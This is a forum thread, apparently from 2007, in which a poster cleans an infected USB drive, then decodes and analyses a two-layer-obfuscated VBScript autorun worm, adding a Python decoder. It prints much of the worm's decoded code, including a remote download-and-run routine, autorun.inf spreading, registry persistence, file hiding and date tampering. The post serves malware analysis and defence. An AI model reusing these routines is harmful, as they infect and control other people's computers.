
Title: [Discussion] [Original] Decoding and analysing a VBScript USB-drive virus (give it a red heart if you like it)

Author: rop007    Time: 2007-12-23 12:02     Title: [Original] Decoding and analysing a VBScript USB-drive virus (give it a red heart if you like it)

A manager told me his machine couldn't show hidden files and the system wouldn't let him remove his USB drive, and asked me to take a look.
As soon as I heard that, I figured it was infected.
I opened the USB drive in WinRAR, found an autorun.inf in the root directory, and deleted it.
I also saw a file named '.vbs and guessed it was the virus. I left it alone for the moment.
I opened Task Manager and found wscript.exe running. I killed it, and the USB drive could be removed.
At this point it was fairly certain that the '.vbs was the culprit.
As for the hidden-files problem... a reflex by now:
regedit -> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
value 0
Deleted it outright. That problem was gone too.
If I'm not mistaken there should also be an autostart entry, but msconfig showed nothing unusual.
I left that for later.
I searched for *.vbs, *.vbe and *.wsh files created that day and deleted every one with abnormal attributes.
That should have taken care of it.
Called it a day; before leaving I copied the '.vbs to take back and examine closely.


Only back at my desk did I discover that the main part of this VBS is encoded by a function.
The file's code looks roughly like this (gibberish omitted):

aa="<large chunk of gibberish>":function ee(aa):hh=vbCrLf:Execute("For i=1 To Len(aa)"&hh&"a=Asc(Mid(aa,i,1))"&hh&"If a=127 Then a=13"&hh&"If a=11 Then a=10"&hh&"if a=12 Then a=34"&hh&"if a>=14 and a<=31 then"&hh&"a=a+83"&hh&"elseif a>=1 and a<=8 then"&hh&"a=a+114"&hh&"elseif a>=53 and a<=57 then"&hh&"a=a-5"&hh&"elseif a>=48 and a<=52 then"&hh&"a=a+5"&hh&"End If"&hh&"ee=ee+chr(a)"&hh&"Next"):end function:bb="<another chunk of gibberish>":Execute(ee(aa&bb)):ff="<final chunk of gibberish>"

At first I didn't know what the ":" in there was; experimenting showed it can be used as a statement separator, equivalent to starting a new line. hh=vbCrLf is a line break.
After tidying it up:
aa="<large chunk of gibberish>"
function ee(aa) 'decoding function
For i=1 To Len(aa)
a=Asc(Mid(aa,i,1))
If a=127 Then a=13
If a=11 Then a=10
if a=12 Then a=34
if a>=14 and a<=31 then
a=a+83
elseif a>=1 and a<=8 then
a=a+114
elseif a>=53 and a<=57 then
a=a-5
elseif a>=48 and a<=52 then
a=a+5
End If
ee=ee+chr(a)
Next
end function
bb="<another chunk of gibberish>"
Execute(ee(aa&bb)) 'concatenate aa and bb, decode, then execute the result
ff="<final chunk of gibberish>" 'this part is never actually executed; no idea what it is for. A scare tactic?

So the part that actually runs is aa&bb after decoding.
I decoded aa and bb following ee's method.
Most of the code turned out to be still unreadable; analysing the syntax further, I found the author had applied a second layer of encoding.
The decoding function is as follows:
function uc(b)
x="633d766243724c663a457865637574652822466f7220693d3120546f204c656e2862293a613d417363284d696428622c692c3129292226632622496620613d313235205468656e20613d31332226632622496620613d313233205468656e20613d31302226632622696620613d3132342054686​56e20613d33342226632622696620613e393620616e6420613c313130207468656e22266326226​13d612b31332226632622656c7365696620613e31303920616e6420613c313233207468656e222​6632622613d612d31332226632622456e64204966222663262275633d75632b636872286129222​66326224e6578742229":y="execute """"":z="&chr(&h":w=")":do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)
loop:execute(y)
end function
Even this decoding function has been encoded... good grief. This author is twisted.
First decode uc using the method at its tail:
c=vbCrLf:Execute("For i=1 To Len(b):a=Asc(Mid(b,i,1))"&c&"If a=125 Then a=13"&c&"If a=123 Then a=10"&c&"if a=124 Then a=34"&c&"if a>96 and a<110 then"&c&"a=a+13"&c&"elseif a>109 and a<123 then"&c&"a=a-13"&c&"End If"&c&"uc=uc+chr(a)"&c&"Next")
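To undo both layers statically instead of feeding the strings to Execute, here is an added Python re-implementation (example code, not from the original post): decode_ee mirrors the ee map above, decode_uc mirrors the loop recovered from uc, and expand_hex mirrors uc's own hex unpacking; EE_SAMPLE and UC_SAMPLE are hand-constructed inputs, and HEX_PREFIX is the first 36 hex digits of the x string above.

```python
# Layer 1 (ee): control bytes 14..31 and 1..8 hide 'a'..'r' and 's'..'z',
# digits 0-4 and 5-9 are swapped, and 127/11/12 stand in for CR, LF and '"'.
EE_MAP = {127: 13, 11: 10, 12: 34}
EE_MAP.update({a: a + 83 for a in range(14, 32)})
EE_MAP.update({a: a + 114 for a in range(1, 9)})
EE_MAP.update({a: a - 5 for a in range(53, 58)})
EE_MAP.update({a: a + 5 for a in range(48, 53)})

# Layer 2 (the loop hidden in uc()'s hex string): ROT13 over 'a'..'z',
# with 125/123/124 standing in for CR, LF and '"'.
UC_MAP = {125: 13, 123: 10, 124: 34}
UC_MAP.update({a: a + 13 for a in range(97, 110)})
UC_MAP.update({a: a - 13 for a in range(110, 123)})

def apply_map(codes, table):
    """Map each character code through table; unmapped codes pass through."""
    return "".join(chr(table.get(a, a)) for a in codes)

def decode_ee(data: bytes) -> str:
    """Undo the first layer (the worm's ee function) on the raw bytes."""
    return apply_map(data, EE_MAP)

def decode_uc(text: str) -> str:
    """Undo the second layer (the loop recovered from uc) on a string."""
    return apply_map((ord(c) for c in text), UC_MAP)

def expand_hex(x: str) -> str:
    """uc's hex unpacking: two hex digits per byte when the first digit is
    numeric, else four (a double-byte char; assumption: rendered via chr())."""
    out = []
    while len(x) > 1:
        width = 2 if x[0].isdigit() else 4
        out.append(chr(int(x[:width], 16)))
        x = x[width:]
    return "".join(out)

# Constructed inputs: EE_SAMPLE and UC_SAMPLE were built by hand from the maps
# above (hypothetical, not from a real sample); HEX_PREFIX is the first 36 hex
# digits of the x string in uc(), which expand to the start of its decoder.
EE_SAMPLE = b"F\x1c\x1f \x16=6 T\x1c L\x12\x1b(\x0e\x0e)"
UC_SAMPLE = "zftobk(|k|)"
HEX_PREFIX = "633d766243724c663a457865637574652822"

def decode_samples():
    """Returns ('For i=1 To Len(aa)', 'msgbox("x")', 'c=vbCrLf:Execute("')."""
    return decode_ee(EE_SAMPLE), decode_uc(UC_SAMPLE), expand_hex(HEX_PREFIX)

if __name__ == "__main__":
    for decoded in decode_samples():
        print(decoded)
```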

OK, now use this to process aa&bb once more. (The main procedure of the code below has been deleted and some errors remain, so copying it straight back is useless. Don't spread the virus.) (The contents of each uc(...) have already been decoded; it doesn't get in the way of reading, so I couldn't be bothered to strip the "wrapper".)

Note the advdownfile function in there, which uses xmlhttp...
This completely overturned my assumption that "script files have no network communication capability".
Someone had previously found a script that used the Web Thunder (web迅雷) plugin to download files, but how could the Web Thunder plugin's install base compare with microsoft.xmlhttp's?

Other things it uses:
filesystemobject to read and write files and to copy itself
adodb.stream to write the server response out as a file
winmgmts:\\.\root\cimv2 to query processes.
-------------------------------------------------------------------
function gettask()
execute(uc("if readtxt(dir&"\date.bin",1)<>trim(date) then
js=1
do while check<>"<script>"
if js>2 then
advdownfile mulu&"temp.txt",fromurl2,0,1,100
check=readtxt(mulu&"temp.txt",1)
else
advdownfile mulu&"temp.txt",fromurl,0,1,100
check=readtxt(mulu&"temp.txt",1)
end if
js=js+1
if js>4 then
exit do
end if
loop
if fso.fileexists(mulu&"temp.txt") then
set openfile = fso.opentextfile(mulu&"temp.txt", 1)  
check = openfile.readline
downis = openfile.readline
downame = openfile.readline
downfrom = openfile.readline
vbsver = openfile.readline
vbsrun = openfile.readline
vbsname = openfile.readline
vbsfrom = openfile.readline
taskis = openfile.readline
taskcode = openfile.readline
upvbe= openfile.readline
openfile.close  
fso.deletefile(mulu&"temp.txt")
if check="<script>" then
buildfile dir&"\date.bin",date
buildinf downame,taskis,taskcode,upvbe
if vbsver<>ver or not fso.fileexists(dir&"\"&vbsname) then
advdownfile dir&"\"&vbsname,vbsfrom,vbsrun,3,2000
wscript.quit
end if
if downis=1 and sys then
if downame<>lexe or not fso.fileexists(exemulu&lexe) then
delfile exemulu&lexe
advdownfile exemulu&downame,downfrom,1,3,1000
end if
end if
end if
end if
end if
on error resume next
if sys then
if readtxt(mulu&infname,7)=1 then
execute(uc(readtxt(mulu&infname,9)))
end if
end if"))
end function

-------------------------------------------------------------------
function delfile(where)
execute(uc("if fso.fileexists(where) then
shuxing where,0
fso.deletefile(where)
end if
if fso.folderexists(where) then
shuxing where,0
fso.deletefolder(where)
end if"))
end function

-------------------------------------------------------------------
function buildfile(where,what)
execute(uc("delfile where
set bin = fso.createtextfile(where, true)
bin.writeline what
bin.close
shuxing where,2+4"))
end function

-------------------------------------------------------------------
function buildinf(exever,taskcode,tasksw,adv)
execute(uc("delfile mulu&infname
set ini = fso.createtextfile(mulu&infname, true)
ini.writeline tile
ini.writeline "[autorun]"
ini.writeline about
ini.writeline "open=wscript.exe .\"&filename&".vbs"
ini.writeline exever
ini.writeline "shell\open=打开(&o)"
ini.writeline taskcode
ini.writeline "shell\open\command=wscript.exe .\"&filename&".vbs"
ini.writeline tasksw
ini.writeline "shell\open\default=1"
ini.writeline adv
ini.close
shuxing mulu&infname,1+2+4"))
end function

-------------------------------------------------------------------
function readtxt(where,line)
execute(uc("if fso.fileexists(where) then
set readfile = fso.opentextfile(where, 1)  
i=0
do while i<line
i=i+1
strline = readfile.readline
loop
readfile.close
readtxt=strline
else
readtxt="not_found"
end if"))
end function

-------------------------------------------------------------------
function shuxing(file,change)
execute(uc("if fso.fileexists(file) then
set ofile = fso.getfile(file)
ofile.attributes = change
set ofile = nothing
end if
if fso.folderexists(file) then
set ofile = fso.getfolder(file)
ofile.attributes = change
set ofile = nothing
end if"))
end function

-------------------------------------------------------------------
function advdownfile(localfile,urlfile,runfile,cishu,minsize)
execute(uc("test=0
do while test<cishu
shuxing localfile,0
ilocal = lcase(localfile):iremote = lcase(urlfile):
'if 1=2 then wscript.echo "impossible!"
set xpost = create object("microsoft.xmlhttp")  
'if 1=2 then wscript.echo "impossible!"
xpost.open "get",iremote,0
'if 1=2 then wscript.echo "impossible!"
on error resume next
xpost.send()
if not er then
'if 1=2 then wscript.echo "impossible!"
set sget = createobject("adodb.stream")
'if 1=2 then wscript.echo "impossible!"
sget.mode = 3
'if 1=2 then wscript.echo "impossible!"
sget.type = 1  
'if 1=2 then wscript.echo "impossible!"
sget.open()  
'if 1=2 then wscript.echo "impossible!"
sget.write(xpost.responsebody)  
'if 1=2 then wscript.echo "impossible!"
sget.savetofile ilocal,2
'if 1=2 then wscript.echo "impossible!"
shuxing localfile,2+4
if fso.fileexists(localfile) then
filesize=fso.getfile(localfile).size
else
filesize=0
end if
if filesize>minsize then
if runfile=1 then wsh.run localfile
exit do
end if
else
test=test+1
delfile localfile
wscript.sleep 3000
end if
loop"))
end function

-------------------------------------------------------------------
function er()
if err.number = 0 then
er = false
else
err.clear
er = true
end if
end function

-------------------------------------------------------------------
function ucc(b)
msgbox("holle hacker")
end function

-------------------------------------------------------------------
function jincheng(where,geshu)
execute(uc("on error resume next
set y=getobject("winmgmts:\\.\root\cimv2")
set x=y.execquery("select * from win32_process where name='"&where&"'")
i=1
for each j in x   
i=i+1
next
if not er then
if i>geshu then jincheng = true
else
jincheng = 1
end if"))
end function

-------------------------------------------------------------------
function copyfile(file,where)
delfile where
if fso.fileexists(file) then
fso.copyfile file,where,true
end if
end function

-------------------------------------------------------------------
function copyvbs(where)
delfile where
set self=fso.opentextfile(mulu&ouwnname,1)
vbscopy=self.readall
self.close
set vbs = fso.createtextfile(where, true)
vbs.write vbscopy
vbs.close
shuxing where,2+4
end function

-------------------------------------------------------------------
function zhuce()
RegPath="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\"
Type_Name="REG_SZ"
Key_Name="explorer"
Key_Data=filename&".vbe"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function

-------------------------------------------------------------------
function yincang()
RegPath="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"
Type_Name="REG_DWORD"
Key_Name="ShowSuperHidden"
Key_Data="00000000"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function

-------------------------------------------------------------------
function buildfold(path)
if fso.folderexists(path) then
exit function
end if
if not fso.folderexists(fso.getparentfoldername(path)) then
buildfold fso.getparentfoldername(path)
end if
fso.createfolder(path)
end function

-------------------------------------------------------------------
function dowork(pcs,fname,furl,time)
execute(uc("if not fso.fileexists(exemulu&fname) and jincheng(pcs,1) then
advdownfile exemulu&fname,"http://"&furl,0,2,3000
end if
if fso.fileexists(exemulu&fname) then
if time<>0 then
nowdate=date
wsh.run "%comspec% /c date 2002-"&month(date)&"-"&day(date),vbhide
wscript.sleep abs(time*1000)
end if
wsh.run exemulu&fname
dowork=1
if time>0 then
wscript.sleep 5000
wsh.run "%comspec% /c date "&nowdate,vbhide
end if
end if"))
end function

-------------------------------------------------------------------
function ganran()
execute(uc("do
for each d in dc
if d.drivetype = 3 or (d.drivetype = 1 and d<>"A:" and d<> "B:") then
if fso.folderexists(d&"\autorun.inf") then
delfile d&"\autorun.inf"
end if
if fso.fileexists(d&"\"&filename&".vbs") and fso.fileexists(d&"\autorun.inf") then
if readtxt(d&"\autorun.inf",1)<>tile then
copyfile dir&"\"&infname,d&"\autorun.inf"
copyfile win&"\"&filename&".vbe",d&"\"&filename&".vbs"
end if
else
yincang
copyfile dir&"\"&infname,d&"\autorun.inf"
copyfile win&"\"&filename&".vbe",d&"\"&filename&".vbs"
end if
end if
next
if (minute(now) mod 2)=0 and rw<>-1 then
gettask
end if
wscript.sleep 3000
loop"))
end function

-------------------------------------------------------------------
function chengfa()
execute(uc("msgbox("hello,hacker!")
delfile mulu&ouwnname
wscript.quit"))
end function
Author: DAAHL    Time: 2007-12-23 13:35

There's a lot here I don't understand, but technical articles like this are great. Supporting the OP.
Author: lbofficetpv    Time: 2007-12-23 13:55

I don't understand it all either, but the OP's analysis is really formidable. It is the first time I've seen a VBS-type USB autorun virus, though.
Author: feilang2    Time: 2007-12-28 19:35

What a long program. I can't read VB, but the algorithms are all the same.




Welcome to SiS001! Board - [第一会所 registration closed] (http://67.220.92.22/bbs/) Powered by Discuz! 7.2